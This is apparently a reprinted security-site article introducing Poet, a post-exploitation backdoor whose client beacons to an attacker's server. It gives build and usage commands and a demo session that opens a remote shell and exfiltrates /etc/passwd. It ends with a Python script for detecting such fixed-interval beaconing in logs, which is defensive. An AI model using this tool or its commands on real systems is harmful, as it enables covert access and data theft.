Summary
The client program runs on the target system and is configured with the server's IP address and a beacon interval for connecting to the server. If the server is not online when the client attempts to connect, the client goes into a silent sleep and waits for the next interval before trying again. Once the server is running, the attacker gets a shell and can control the client to perform various operations on the target host, such as:
1. Network reconnaissance;
2. Remote shell;
3. Document extraction;
4. Download and execute payload;
5. Program self-destruction
Tool download
Poet: https://github.com/mossberg/poet
Visit the project's GitHub releases page and download the latest poet client and poet server files, or build the poet project yourself as follows.
Build code
Make sure you have Python 2.7 and the zip executable installed, and then run the following command:
$ git clone https://github.com/mossberg/poet
$ cd poet
$ make
After the build finishes, a bin/ directory containing the poet client and poet server is created on your machine.
Tool usage
Poet is very simple to use and needs only the Python 2.7 standard library to run. Here is a simple example:
Terminal 1:
$ ./client.py -v 127.0.0.1 1
Terminal 2:
$ sudo ./server.py
Note: in the default configuration, the server must run with root privileges (via sudo), because the tool binds port 443 by default. You can use the -p <port> option to change the port used by the client and server; a port above 1024 is recommended.
You can also use the -h option to view the help menu:
Client:
$ ./client.py -h
usage: client.py [-h] [-p PORT] [-v] [-d] IP INTERVAL
positional arguments:
  IP                    server
  INTERVAL              (s)
optional arguments:
  -h, --help            show this help message and exit
  -p PORT, --port PORT
  -v, --verbose
  -d, --delete          delete client upon execution
Server side:
$ ./server.py -h
usage: server.py [-h] [-p PORT]
optional arguments:
  -h, --help            show this help message and exit
  -p PORT, --port PORT
Configuration reference
The common/config.py file contains several configuration options:
1. AUTH: the secret authentication token shared between the client and the server, used to authenticate the client. The precompiled release uses a default, publicly known token; users should set a complex token of their own to secure the communication.
2. ARCHIVE_DIR: the directory where the server stores files (command output or exfiltrated files).
3. SERVER_IP: the IP address of the server.
4. BEACON_INTERVAL: the interval (in seconds) between the client's beacons to the server.
Poet usage demo
In the following attack scenario, the attacker has obtained access to the target host and has downloaded and executed the client program there. At this point the attacker's server is not running, but that doesn't matter: the client will wait patiently. Eventually the attacker starts the server, first opens a shell and runs uname -a, then exfiltrates /etc/passwd. Finally he disconnects from the client, which continues to run in the background on the target host and waits for the next connection to the server.
Target device (5.4.3.2):
$ ./client.py -v 1.2.3.4 10
[+] Poet started with delay of 10 seconds to port 443. Ctrl-c to exit.
[!] (2014-09-06 02:07:03.058921) Server is inactive
[!] (2014-09-06 02:07:13.060840) Server is inactive
[!] (2014-09-06 02:07:23.062512) Server is inactive
[!] (2014-09-06 02:07:33.064214) Server is inactive
[+] (2014-09-06 02:07:43.066828) Server is active
[!] (2014-09-06 02:08:50.403668) Server is inactive
[!] (2014-09-06 02:09:00.405364) Server is inactive
Attacker's device (1.2.3.4):
# ./server.py
[+] Poet server started on 443.
[i] (2014-09-06 02:07:43.066092) Connected By: ('5.4.3.2', 62209)
[+] (2014-09-06 02:07:43.066531) Entering control shell
Welcome to psh, the poet shell!
Running `help' will give you a list of supported commands.
psh > shell
psh > [email protected] $ uname -a
Linux lolServer 3.8.0-29-generic #42~precise1-Ubuntu SMP Wed May 07 16:19:23 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
psh > [email protected] $ ^D
psh > exfil /etc/passwd
psh : exfil written to archive/20140906/exfil/passwd
psh > help
Commands:
chint
dlexec
exec
exfil
exit
help
recon
selfdestruct
shell
psh > exit
[+] (2014-09-06 02:08:40.401181) Exiting control shell.
[-] (2014-09-06 02:08:40.401328) Poet terminated.
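The fixed-delay retry loop visible in the client output above is also what gives a defender something to key on: connections to the same host and port at near-constant intervals, interrupted only while the operator's shell is open. As an added example that is not part of poet, the Python 3 script below scores flows in a connection log by the regularity of their inter-arrival times; the log line format and the sample lines are constructed to mirror the timing of this session.

```python
# Flag fixed-interval beaconing in connection logs. Added example, not part
# of the poet project; the log format and sample lines are constructed.
from collections import defaultdict
from datetime import datetime
from statistics import median

# Constructed sample mirroring the demo: the client retries 1.2.3.4:443 every
# 10 s, pauses while the operator's shell is open, then resumes. Unrelated
# traffic to 10.0.0.9:80 is mixed in. Line format (hypothetical):
# "<date> <time> <src> -> <dst>:<port>"
SAMPLE_LOG = """\
2014-09-06 02:07:03 5.4.3.2 -> 1.2.3.4:443
2014-09-06 02:07:05 5.4.3.2 -> 10.0.0.9:80
2014-09-06 02:07:13 5.4.3.2 -> 1.2.3.4:443
2014-09-06 02:07:23 5.4.3.2 -> 1.2.3.4:443
2014-09-06 02:07:33 5.4.3.2 -> 1.2.3.4:443
2014-09-06 02:07:41 5.4.3.2 -> 10.0.0.9:80
2014-09-06 02:07:43 5.4.3.2 -> 1.2.3.4:443
2014-09-06 02:08:50 5.4.3.2 -> 1.2.3.4:443
2014-09-06 02:09:00 5.4.3.2 -> 1.2.3.4:443
"""

def parse_flows(log):
    """Group connection timestamps by (source, destination:port)."""
    flows = defaultdict(list)
    for line in filter(None, log.splitlines()):
        date, clock, src, _, dst = line.split()
        flows[(src, dst)].append(datetime.strptime(date + " " + clock, "%Y-%m-%d %H:%M:%S"))
    return flows

def periodicity(times, tolerance=0.2):
    """Median gap between connections and the fraction of gaps within
    +/- tolerance of it. A sleep/retry timer gives a tight cluster of gaps;
    one long outlier (the interactive session) does not mask it."""
    gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
    if len(gaps) < 2:
        return None, 0.0
    med = median(gaps)
    regular = sum(1 for g in gaps if abs(g - med) <= tolerance * med)
    return med, regular / len(gaps)

def find_beacons(log, min_connections=5, min_regular=0.7):
    """Return (src, dst, interval_seconds) for flows that look like beacons."""
    hits = []
    for (src, dst), times in parse_flows(log).items():
        if len(times) < min_connections:
            continue
        med, regular = periodicity(sorted(times))
        if med is not None and regular >= min_regular:
            hits.append((src, dst, med))
    return hits
```

On the sample, the 443 flow is reported as a 10 s beacon despite the 67 s gap during the shell session, while the two port-80 connections fall below the minimum count.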
*Reference source: n0where, compiled by FB editor alpha_h4ck, reprinted from freebuf.com